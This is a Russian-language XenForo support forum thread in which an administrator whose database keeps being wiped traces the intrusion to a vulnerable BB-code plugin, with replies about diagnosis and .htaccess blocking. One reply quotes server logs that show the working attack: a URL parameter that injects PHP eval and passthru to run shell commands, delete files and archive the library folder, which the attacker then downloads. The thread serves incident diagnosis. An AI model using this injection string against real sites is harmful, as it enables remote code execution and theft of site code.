1. Приветствуем Вас на неофициальном форуме технической поддержки XenForo на русском языке. XenForo - коммерческий форумный движок от бывших создателей vBulletin, написанный на PHP.

Взлом XenForo (причина была в плагине Esthetic Extended BB-Codes 1.0.4)

Тема в разделе "OFF-топик", создана пользователем shaman480, 03.12.2014.

Загрузка
Статус темы:
Закрыта.
  1. shaman480

    shaman480 Местный

    Регистрация:
    22.12.10
    Сообщения:
    640
    Симпатии:
    487
    Версия XF:
    1.4.3
    Привет всем.
    Уже неделю борюсь со взломщиками сайта на XenForo 1.4.3
    Они каким то образом очищают базу данных всего сайта (полностью база остается чистой).
    А сегодня мне написали они в личку, с тем условием, что пользователь был с именем test (новорег) и со званием Администратор.
    1.png
    Уже перепроверил все права доступа к файлам и каталогам:
    Права на каталоги - 755
    Права на файлы - 644
    На папки data и internal_data стоят права - 777
    Уже поменял пароли для Администратора, поменял пароль к базе данных, поменял пароль для ftp, поменял пароль для входа на хостинг.
    Вот список установленных дополнений:
    2.png
    Уже не могу понять как они могут пробираться на сайт.
    --- добавлено : Dec 3, 2014 9:35 AM ---
    IP Адрес с которого мне написал - 46.246.87.88
    --- добавлено : Dec 3, 2014 9:39 AM ---
    Получается странно, В журнале действий администратора она даже не числится что есть такой администратор.
     
    Последнее редактирование модератором: 11.12.2014
  2. infis

    infis Местный

    Регистрация:
    27.06.11
    Сообщения:
    5 966
    Симпатии:
    3 548
    Версия XF:
    1.5.9
    Логи веб-сервера помогут, из которых будет понятно, по каким адресам ходили. Естественно, при условии, что не хостинг поломали. Очистить базу непосредственно даже через админку нельзя. Т.е. однозначно залили шелл. Я бы проверил все шаблоны и файлы на наличие закладок.
     
    Kolya groza morey нравится это.
  3. Reborns

    Reborns Местный

    Регистрация:
    24.11.11
    Сообщения:
    91
    Симпатии:
    48
    Версия XF:
    1.5.5
    было почти такое у меня в прошлом , решилось заменой хостера "вообще сейчас выделенка и за всем сам слежу", поскольку ломали именно через дыры на самом серваке.
    .............
    И на счет плагинов , разве TMS нужен на последней ксене ?
     
    Последнее редактирование: 03.12.2014
  4. shaman480

    shaman480 Местный

    Регистрация:
    22.12.10
    Сообщения:
    640
    Симпатии:
    487
    Версия XF:
    1.4.3
    Каким образом это осуществить?
    --- добавлено : 3 дек 2014 в 14:22 ---
    Вот логи сервера -
     

    Вложения:

    Последнее редактирование модератором: 11.12.2014
  5. Exile

    Exile Местный

    Регистрация:
    27.06.11
    Сообщения:
    997
    Симпатии:
    545
    Версия XF:
    1.4.4
    shaman480, а дополнения Esthetic купленные? Если нет - удаляйте полностью, вместе с файлами от них в папке library.
     
  6. shaman480

    shaman480 Местный

    Регистрация:
    22.12.10
    Сообщения:
    640
    Симпатии:
    487
    Версия XF:
    1.4.3
    Плюнул на все, и установил заново форум и с помощью импорта импортировал данные (вложения не импортировал).
    Установил только два дополнения:
    esthetic.extended.bb-codes.v.1.0.4
    Esthetic Simple Payments 1.0.3

    Спустя 30 минут базу очистили!
    --- добавлено : 3 дек 2014 в 16:40 ---
    Дополнения куплены
     
    Последнее редактирование модератором: 11.12.2014
  7. Exile

    Exile Местный

    Регистрация:
    27.06.11
    Сообщения:
    997
    Симпатии:
    545
    Версия XF:
    1.4.4
    shaman480, могу безвозмездно глянуть интереса ради в чем беда. Напишите в личку данные для связи с вами (skype, например).
     
  8. shaman480

    shaman480 Местный

    Регистрация:
    22.12.10
    Сообщения:
    640
    Симпатии:
    487
    Версия XF:
    1.4.3
    Доступа к хостингу дать не могу, там не один сайт стоит.
     
  9. Exile

    Exile Местный

    Регистрация:
    27.06.11
    Сообщения:
    997
    Симпатии:
    545
    Версия XF:
    1.4.4
    Это не самая большая проблема. Главное чтобы умели выполнять команды в консоли которые писать буду и скидывать вывод.
     
  10. infis

    infis Местный

    Регистрация:
    27.06.11
    Сообщения:
    5 966
    Симпатии:
    3 548
    Версия XF:
    1.5.9
    Обратите внимание на серию таких запросов:
    Код:
    46.246.87.88 - - [03/Dec/2014:10:53:35 +0200] "POST /brivium-modern-statistic/statistics.json HTTP/1.0" 200 15120 "http://site.ru/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36" 
    Т.е. что-то заливается на сервер.
    Затем:
    Код:
    46.246.87.88 - - [03/Dec/2014:10:59:55 +0200] "POST /deferred.php HTTP/1.0" 200 21 "http://site.ru/threads/premium-shablon-dw-jason-bootstrap-3-bonusy.792/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36" 
    Ну а далее уже эксплуатируется:
    Код:
    46.246.87.88 - - [03/Dec/2014:11:00:06 +0200] "GET /threads/premium-shablon-dw-jason-bootstrap-3-bonusy.792/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27dir%27)); HTTP/1.0" 200 438 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
    46.246.87.88 - - [03/Dec/2014:11:00:38 +0200] "GET /threads/premium-shablon-dw-jason-bootstrap-3-bonusy.792/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27rm%20foo.tar.gz%27)); HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
    46.246.87.88 - - [03/Dec/2014:11:00:46 +0200] "GET /threads/premium-shablon-dw-jason-bootstrap-3-bonusy.792/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27rm%20dir%27)); HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
    46.246.87.88 - - [03/Dec/2014:11:00:52 +0200] "GET /threads/premium-shablon-dw-jason-bootstrap-3-bonusy.792/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27dir%27)); HTTP/1.0" 200 421 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
    46.246.87.88 - - [03/Dec/2014:11:01:21 +0200] "GET /threads/premium-shablon-dw-jason-bootstrap-3-bonusy.792/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27tar%20-cvvzf%20foo.tar.gz%20./library%27)); HTTP/1.0" 200 307531 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
    46.246.87.88 - - [03/Dec/2014:11:01:32 +0200] "GET /foo.tar.gz HTTP/1.0" 200 2802968 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
    46.246.87.88 - - [03/Dec/2014:11:01:43 +0200] "GET /threads/premium-shablon-dw-jason-bootstrap-3-bonusy.792/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27rm%20foo.tar.gz%27)); HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
    46.246.87.88 - - [03/Dec/2014:11:01:51 +0200] "GET /threads/premium-shablon-dw-jason-bootstrap-3-bonusy.792/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27dir%27)); HTTP/1.0" 200 421 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
    
    В общем это информация к размышлению.
     
    fly_indiz нравится это.
  11. Kolya groza morey

    Kolya groza morey Местный

    Регистрация:
    14.06.13
    Сообщения:
    366
    Симпатии:
    118
    Версия XF:
    1.5.9
    может через другой сайт ломают. Проверяйте все сайты
     
  12. Exile

    Exile Местный

    Регистрация:
    27.06.11
    Сообщения:
    997
    Симпатии:
    545
    Версия XF:
    1.4.4
    TAIFUN, patrig и infis нравится это.
  13. лиса

    лиса Заблокирован

    Регистрация:
    05.10.10
    Сообщения:
    395
    Симпатии:
    84
    На этом сайте у меня несколько тем, посвящённых безопасности сайта. Отзывы в основном такие, не нужно, это вредно, XenForo защищён хорошо. Для тех, кто не согласен с этими отзывами можете ознакомится с моими темами (см. в профиле).
    За основу построения защиты сайта я взяла правило, не подпускать злодеев к скриптам движка.
    Алгоритм работы злодеев таков, что вначале приходит программа сканирующая сайт на предмет установления типа движка. Программа тупо перебирает наименования файлов известных ей движков форумов. Если воспрепятствовать сканированию файлов сайта, то сам злодей, скорее всего, не придёт, продолжения не будет.
    Если же злодей пришёл, например, сайт известный, то надо закрыть ему ходы по которым он проникает к скриптам и банить его по IP адресу. Если нет программы для этого, то вручную прописать в файл .htaccess следующий код (применительно к данному случаю)
    ## USER IP BANNING
    <Limit GET POST>
    order allow,deny
    deny from 46.246.87.88
    allow from all
    </Limit>
    или по маске все IP адреса начинающиеся на 46.246.
    <Limit GET POST>
    order allow,deny
    deny from 46.246.
    allow from all
    </Limit>

    Вот, только за выходные на моём сайте были пойманы и забанены злодеи с такими адресами
    # 2014-12-06 01:29:58
    deny from 91.218.229.12
    # 2014-12-06 01:29:58
    deny from 5.101.157.43
    # 2014-12-06 01:29:58
    deny from 217.112.35.27
    # 2014-12-06 01:30:00
    deny from 193.232.241.224
    # 2014-12-06 01:30:30
    deny from 212.154.192.207
    # 2014-12-06 05:55:18
    deny from 92.249.104.62
    # 2014-12-06 18:13:47
    deny from 148.251.21.143
    # 2014-12-06 18:28:48
    deny from 5.44.169.179
    # 2014-12-07 01:05:54
    deny from 186.207.63.160
    # 2014-12-07 03:41:29
    deny from 5.61.35.102
    # 2014-12-07 07:46:35
    deny from 78.137.18.161
     
  14. SrDEN

    SrDEN Местный

    Регистрация:
    29.08.14
    Сообщения:
    117
    Симпатии:
    54
    Версия XF:
    1.5.0
    @лиса а вы думаете что злоумышленник со своего ипа сканирует?) Если я приду с тора, то ваш .htaccess заметно пожирнеет, IP там меняется на лету. Не проще ли админку закрыть от всех и не парится?)
     
    Kolya groza morey нравится это.
  15. лиса

    лиса Заблокирован

    Регистрация:
    05.10.10
    Сообщения:
    395
    Симпатии:
    84
    Вы внимательнее читайте.
    Программа обходит сайты и устанавливает тип движка. Злодею на данном этапе конкретный сайт не нужен. Отсюда не будет программа перебирать адреса, это раз, программе не известен алгоритм бана по адресу, это два.
    Приходите.
    Здесь уже пытались взломать админку на моём сайте.
    Но, как я поняла, в данном случае в админку попадают через базу форума, поэтому, зашита админки, это для защиты от начинающих злодеев.
     
  16. SrDEN

    SrDEN Местный

    Регистрация:
    29.08.14
    Сообщения:
    117
    Симпатии:
    54
    Версия XF:
    1.5.0
    а не легче ли посмотреть что за юзер агенты у ботов и по ним накрыть, чтоб каждый раз IP не добавлять?
    Код:
    ## .htaccess Code :: BEGIN
    ## Block Bad Bots by user-Agent
    SetEnvIfNoCase user-Agent ^FrontPage [NC,OR]
    SetEnvIfNoCase user-Agent ^Java.* [NC,OR]
    SetEnvIfNoCase user-Agent ^Microsoft.URL [NC,OR]
    SetEnvIfNoCase user-Agent ^MSFrontPage [NC,OR]
    SetEnvIfNoCase user-Agent ^Offline.Explorer [NC,OR]
    SetEnvIfNoCase user-Agent ^[Ww]eb[Bb]andit [NC,OR]
    SetEnvIfNoCase user-Agent ^Zeus [NC]
    <Limit GET POST HEAD>
    Order Allow,Deny
    Allow from all
    Deny from env=bad_bot
    </Limit>
    ## .htaccess Code :: END
    Скажите куда, и вам придется записывать свой .htaccess на фитнес :)
     
  17. Yoskaldyr

    Yoskaldyr Пользователь

    Регистрация:
    27.09.10
    Сообщения:
    1 921
    Симпатии:
    1 163
    Версия XF:
    1.0.4
    лиса, 2 момента:
    • на нормально настроенном сервере апача принципиально нет как вида (ибо не нужен он как лишний оверхед),
    • если htaccess пожирнеет (а он пожирнеет потому что боты сканируют/атакуют всегда через сети проксей) то сам апач (не php) будет реально тупить на абсолютно каждом запросе, т.е. своими действиями самостоятельно делаете свой сервер более нагруженным и более уязвимым (как говорится зачем нужны злоумышленники, когда есть админы умеющие самостоятельно и добровольно положить ресурс ).
    И чисто логически - какой смысл блокировать того бота который пришел первоначально просканировать тип движка, если атаковать/спамить (или что там будет делать активная часть бота) бот все равно будет с совершенно другого ip, а чаще даже с кучи различных ip.
     
    Kolya groza morey нравится это.
  18. лиса

    лиса Заблокирован

    Регистрация:
    05.10.10
    Сообщения:
    395
    Симпатии:
    84
    Они представляются стандартными браузерами, значит, будут забанены все пользователи с таким браузером.
    В профиле адресочек. Но опять же напомню, что цель у них сканирование сайта а не, типа, уронить сайт.
    Писали мне об этом. Я отвечала, что рада за всех вас. Значит вам не нужно то о чём я пишу.
    Это чисто теоретическое предположение. Мне достаточно раз в две недели чистить файл htaccess. Ну, и не следует забывать про кэширование на уровне сервера.
    Не дать боту получить результат сканирования, тогда бот не придёт атаковать.
     
  19. infis

    infis Местный

    Регистрация:
    27.06.11
    Сообщения:
    5 966
    Симпатии:
    3 548
    Версия XF:
    1.5.9
    Наивно...
     
    Kolya groza morey нравится это.
  20. лиса

    лиса Заблокирован

    Регистрация:
    05.10.10
    Сообщения:
    395
    Симпатии:
    84
    Но, действует
     
Статус темы:
Закрыта.

Поделиться этой страницей